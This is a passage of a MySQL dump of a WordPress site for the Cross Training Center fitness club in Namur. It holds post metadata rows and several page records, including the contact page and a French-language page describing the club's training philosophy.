(2111, 461, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:150;s:6:\"height\";i:36;s:4:\"file\";s:20:\"2013/11/LesMills.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(2112, 462, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2113, 462, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672417:1\";}\";'),
(2114, 462, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2115, 462, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2116, 463, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2117, 463, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672461:1\";}\";'),
(2118, 463, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2119, 463, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2120, 464, '_wp_attached_file', '2013/11/LesMills1.png'),
(2121, 464, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:140;s:6:\"height\";i:30;s:4:\"file\";s:21:\"2013/11/LesMills1.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(2122, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2123, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672591:1\";}\";'),
(2124, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2125, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2126, 465, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2127, 465, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672591:1\";}\";'),
(2128, 465, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2129, 465, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2130, 466, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2131, 466, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672650:1\";}\";'),
(2132, 466, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2133, 466, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2134, 467, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2135, 467, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672677:1\";}\";'),
(2136, 467, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2137, 467, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2138, 468, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2139, 468, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672724:1\";}\";'),
(2140, 468, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2141, 468, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2142, 469, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2143, 469, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672778:1\";}\";'),
(2144, 469, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2145, 469, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2146, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2147, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672836:1\";}\";'),
(2148, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2149, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2150, 365, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2151, 365, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429606128:1\";}\";'),
(2152, 365, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2153, 365, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(2154, 365, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(2155, 365, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2156, 471, '_menu_item_type', 'post_type'),
(2157, 471, '_menu_item_menu_item_parent', '0'),
(2158, 471, '_menu_item_object_id', '363'),
(2159, 471, '_menu_item_object', 'page'),
(2160, 471, '_menu_item_target', ''),
(2161, 471, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2162, 471, '_menu_item_xfn', ''),
(2163, 471, '_menu_item_url', ''),
(2169, 473, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2170, 473, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429606284:1\";}\";'),
(2171, 473, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2172, 473, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2173, 474, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2174, 474, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429606314:1\";}\";'),
(2175, 474, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2176, 474, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2177, 475, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2178, 475, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429607037:1\";}\";'),
(2179, 475, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2180, 475, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(2181, 475, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(2182, 475, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2183, 476, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2184, 476, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429607171:1\";}\";'),
(2185, 476, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2186, 476, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2187, 477, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2188, 477, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429607255:1\";}\";'),
(2189, 477, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2190, 477, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(2191, 477, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(2192, 477, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2193, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2194, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429608787:1\";}\";'),
(2195, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2196, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(2197, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(2198, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2199, 478, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2200, 478, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429609074:1\";}\";'),
(2201, 478, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2202, 478, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(2203, 478, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(2204, 478, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2205, 479, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2206, 479, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429609173:1\";}\";'),
(2207, 479, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2208, 479, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(2209, 479, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(2210, 479, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2211, 480, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2212, 480, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429609231:1\";}\";'),
(2213, 480, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2214, 480, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(2215, 480, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(2216, 480, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2217, 481, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2218, 481, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429609591:1\";}\";'),
(2219, 481, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2220, 481, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(2221, 481, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(2222, 481, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2223, 482, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2224, 482, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429609993:1\";}\";'),
(2225, 482, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2226, 482, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2227, 483, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2228, 483, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429610098:1\";}\";'),
(2229, 483, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2230, 483, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2231, 484, '_wp_attached_file', '2015/04/map.png'),
(2232, 484, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:300;s:6:\"height\";i:236;s:4:\"file\";s:15:\"2015/04/map.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"map-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:15:\"map-300x224.png\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(2233, 484, '_edit_lock', '1429610652:1'),
(2234, 485, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2235, 485, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429688270:1\";}\";'),
(2236, 485, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2237, 485, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2238, 486, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2239, 486, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429688300:1\";}\";'),
(2240, 486, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2241, 486, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2242, 487, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2243, 487, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429688360:1\";}\";'),
(2244, 487, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2245, 487, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2246, 490, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2247, 490, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441212784:3\";}\";'),
(2248, 490, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2249, 490, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2250, 490, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2251, 490, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441212799:3\";}\";'),
(2252, 490, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2253, 490, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2254, 490, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2255, 490, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441212981:3\";}\";'),
(2256, 490, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2257, 490, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2258, 491, '_wp_attached_file', '2013/11/Capture-d’écran-2015-09-02-à-18.56.23.png'),
(2259, 491, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:795;s:6:\"height\";i:561;s:4:\"file\";s:53:\"2013/11/Capture-d’écran-2015-09-02-à-18.56.23.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:53:\"Capture-d’écran-2015-09-02-à-18.56.23-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"Capture-d’écran-2015-09-02-à-18.56.23-300x211.png\";s:5:\"width\";i:300;s:6:\"height\";i:211;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:53:\"Capture-d’écran-2015-09-02-à-18.56.23-595x224.png\";s:5:\"width\";i:595;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(2260, 492, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"3\";}\";'),
(2261, 492, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441213026:3\";}\";'),
(2262, 492, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2263, 492, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2264, 490, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"3\";}\";');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(2265, 490, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441213090:3\";}\";'),
(2266, 490, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2267, 490, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2268, 493, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"3\";}\";'),
(2269, 493, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441213134:3\";}\";'),
(2270, 493, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2271, 493, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2272, 490, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"3\";}\";'),
(2273, 490, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441213440:3\";}\";'),
(2274, 490, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2275, 490, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2276, 494, '_wp_attached_file', '2013/11/nouvelles-seances-CT.png'),
(2277, 494, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:900;s:6:\"height\";i:635;s:4:\"file\";s:32:\"2013/11/nouvelles-seances-CT.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"nouvelles-seances-CT-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"nouvelles-seances-CT-300x211.png\";s:5:\"width\";i:300;s:6:\"height\";i:211;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:32:\"nouvelles-seances-CT-595x224.png\";s:5:\"width\";i:595;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(2278, 495, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"3\";}\";'),
(2279, 495, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441213455:3\";}\";'),
(2280, 495, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2281, 495, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2282, 496, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"3\";}\";'),
(2283, 496, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441213588:3\";}\";'),
(2284, 496, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2285, 496, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2286, 490, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"3\";}\";'),
(2287, 490, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441213661:3\";}\";'),
(2288, 490, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2289, 490, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2290, 497, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"3\";}\";'),
(2291, 497, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441213661:3\";}\";'),
(2292, 497, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2293, 497, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";');

-- --------------------------------------------------------

--
-- Structure de la table `wp_posts`
--

CREATE TABLE `wp_posts` (
  `ID` bigint(20) UNSIGNED NOT NULL,
  `post_author` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT '0',
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_posts`
--

INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1, 1, '2013-05-23 18:04:49', '2013-05-23 18:04:49', 'Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!', 'Hello world!', '', 'publish', 'open', 'open', '', 'hello-world', '', '', '2013-05-23 18:04:49', '2013-05-23 18:04:49', '', 0, 'http://www.crosstrainingcenter.be/?p=1', 0, 'post', '', 0),
(328, 1, '2013-07-10 15:47:50', '2013-07-10 15:47:50', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-10 15:47:50', '2013-07-10 15:47:50', '', 9, 'http://www.crosstrainingcenter.be/9-revision-19/', 0, 'revision', '', 0),
(5, 1, '2013-05-23 18:12:51', '2013-05-23 18:12:51', '<blockquote>\r\n<h2>Bien plus qu\'une simple activité physique, le cross training center vous propose une approche unique faisant intervenir l\'alimentation et la gestion du stress, tout en vous proposant un entraînement de qualité.</h2>\r\n&nbsp;</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'publish', 'closed', 'open', '', 'notre-philosophie', '', '', '2013-11-04 17:38:55', '2013-11-04 17:38:55', '', 0, 'http://www.crosstrainingcenter.be/?page_id=5', 0, 'page', '', 0),
